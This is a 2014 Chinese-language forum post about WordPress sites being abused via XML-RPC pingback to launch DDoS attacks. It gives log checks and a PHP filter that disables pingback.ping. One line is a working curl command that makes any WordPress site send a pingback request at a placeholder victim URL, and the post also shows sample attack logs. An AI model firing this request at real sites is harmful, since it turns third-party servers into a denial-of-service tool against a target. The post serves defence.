免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2808 | 回复: 0

超過16萬以上的 WordPress 網站被當跳板做DDoS攻擊 [复制链接]

论坛徽章:
0
发表于 2014-03-16 17:58 |显示全部楼层
WordPress 的不安全預設選項 - 任何啟用 Pingback (預設值) 的 WordPress 網站都可以被拿來做 DDoS 攻擊其它伺服器.

你可以檢查自己網站的 log 檔, 如果有出現任何 POST 請求的 XML-RPC 的文件, 類似於原文章的樣式, 可能你的網站就被濫用.

要停止你的 WordPress 網站被濫用, 目前先停用您網站上的 XML-RPC 的功能.

WordPress 的 DDoS 的檢測網址 :
http://labs.sucuri.net/?is-my-wordpress-ddosing

首先, 分析攻擊的行為在 httpd 的協定上 (layer 7) 可以看到類似這樣的攻擊訊息.
  1. 74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"
  2. 121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com"
  3. 217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr"
  4. 193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de"
  5. ..
复制代码
我們可以發現是透過一連串隨機的查詢 (像這種 "?4137049=643182"), 然後所有的來源都是來自合法的 WordPress 網站, 所以很快的就可以把目標打趴了.......

簡單來說, WordPress 一些不安全的預設選項造就了世界上最大的僵屍網路(Botnet)

好吧, 我們來看怎樣開始這一切, 一切都發生在最簡單 ping 回請求的 XML-RPC, 我們可以首先從最簡單的 curl 開始......
  1. curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></param></params></methodCall>'
复制代码
好吧, 攻擊的細節言盡於此, 我們來檢查自己的 WordPress 吧, 首先看自己的 server log 有沒有類似下面的 log
  1. 93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0A<methodCall>\x0A<methodName>pingback.ping</methodName>\x0A<params>\x0A <param>\x0A  <value>\x0A   <string>http://xxxx.com/?1698491=8940641</string>\x0A  </value>\x0A </param>\x0A <param>\x0A  <value>\x0A   <string>yoursite.com</string>\x0A  </value>\x0A </param>\x0A</params>\x0A</methodCall>\x0A"

  2. 94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.devsec.com.tw/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"
复制代码
如果有的話幾乎可以確認你的 WordPress 被拿來攻擊 xxxx.com 跟 www.devsec.com.tw 了.
當然, 沒有的話也不要得意, 很可能只是你的站沒有被人家拿來利用而已, 可以到這邊來檢查有沒有含有這個漏洞.

最後, 我想要提怎樣解決這個問題, 最簡單的方法就是禁用您網站上的 XML-RPC (引用通告)功能, 可以很簡單的刪除 xmlrpc.php 這個檔案, 不過這是一個很爛的方法, 比較科學的方法是再加一個 plugin 來解決這個問題, 這需要很簡單的幾行 code 就可以了.....
  1. add_filter( ‘xmlrpc_methods’, function( $methods ) {
  2.    unset( $methods['pingback.ping'] );
  3.    return $methods;
  4. } );
复制代码
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP